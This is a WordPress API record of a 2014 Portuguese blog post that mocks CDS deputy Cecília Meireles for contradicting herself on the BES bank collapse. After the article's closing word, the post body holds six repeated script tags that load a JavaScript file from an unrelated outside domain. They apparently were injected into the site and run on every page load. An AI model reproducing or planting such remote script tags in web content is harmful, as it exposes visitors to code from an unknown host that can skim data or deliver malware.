{"id":1077,"date":"2014-08-08T09:04:27","date_gmt":"2014-08-08T09:04:27","guid":{"rendered":"http:\/\/www.jralmeida.com\/?p=1077"},"modified":"2014-08-08T09:04:27","modified_gmt":"2014-08-08T09:04:27","slug":"esquizofrenia-na-maioria-sobre-o-bes","status":"publish","type":"post","link":"https:\/\/www.jralmeida.com\/?p=1077","title":{"rendered":"Esquizofrenia na maioria sobre o BES"},"content":{"rendered":"<p>A deputada centrista Cec\u00edlia Meireles fez uma defesa espampanante da decis\u00e3o do Governo no caso BES e da actua\u00e7\u00e3o do banco central. Foi ontem, durante a sess\u00e3o parlamentar com a ministra das Finan\u00e7as, iniciada \u00e0s 16h na Sala do Senado. Mas duas horas depois, na audi\u00e7\u00e3o do governador do Banco de Portugal, j\u00e1 em comiss\u00e3o, a mesma centrista levantou <a title=\"s\u00e9rias d\u00favidas\" href=\"http:\/\/expresso.sapo.pt\/cds-demarca-se-do-banco-de-portugal=f885230\">s\u00e9rias d\u00favidas<\/a> sobre a actua\u00e7\u00e3o do banco central.<\/p>\n<p>N\u00e3o se teria actuado tarde demais? N\u00e3o houve demasiada confian\u00e7a em rela\u00e7\u00e3o \u00e0 administra\u00e7\u00e3o do BES? &#8220;Isto n\u00e3o se pode repetir, e \u00e9 importante perceber o que correu mal, porque manifestamente correu.&#8221;<\/p>\n<p>Ora, toda evolu\u00e7\u00e3o da situa\u00e7\u00e3o no BES , como a pr\u00f3pria ministra disse em entrevista \u00e0 SIC, foi sempre acompanhada e decidida pela ministra das Finan\u00e7as e pelo Governo. Ali\u00e1s, o pr\u00f3prio governador do Banco de Portugal disse nessa mesma sess\u00e3o parlamentar que, em qualquer circunst\u00e2ncia, a tutela \u00e9 que a \u00faltima inst\u00e2ncia de decis\u00e3o.<\/p>\n<p>Tem o Governo dois pensamentos sobre a mesma mat\u00e9ria? O CDS acha que a ministra das Finan\u00e7as esteve mal ao decidir tardiamente? Em que ficamos?<\/p>\n<p>Mas quem a visse no debate com a ministra, Cec\u00edlia Meireles estava armada de todo o argument\u00e1rio oficial. Quem tinha pecado tinha sido&#8230; o PS no caso BPN. Decis\u00e3o essa aprovada em Parlamento tanto pelo PSD, como pelo CDS de Cec\u00edlia Meireles.<\/p>\n<p>Brincamos?<script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><br \/>\n<script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><\/p>\n<p><script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><br \/>\n<script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><\/p>\n<p><script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><br \/>\n<script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A deputada centrista Cec\u00edlia Meireles fez uma defesa espampanante da decis\u00e3o do Governo no caso BES e da actua\u00e7\u00e3o do banco central. Foi ontem, durante a sess\u00e3o parlamentar com a ministra das Finan\u00e7as, iniciada \u00e0s 16h na Sala do Senado. Mas duas horas depois, na audi\u00e7\u00e3o do governador do Banco de Portugal, j\u00e1 em comiss\u00e3o, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":811,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31],"tags":[],"class_list":["post-1077","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"_links":{"self":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/1077","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1077"}],"version-history":[{"count":0,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/1077\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/media\/811"}],"wp:attachment":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1077"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1077"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1077"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}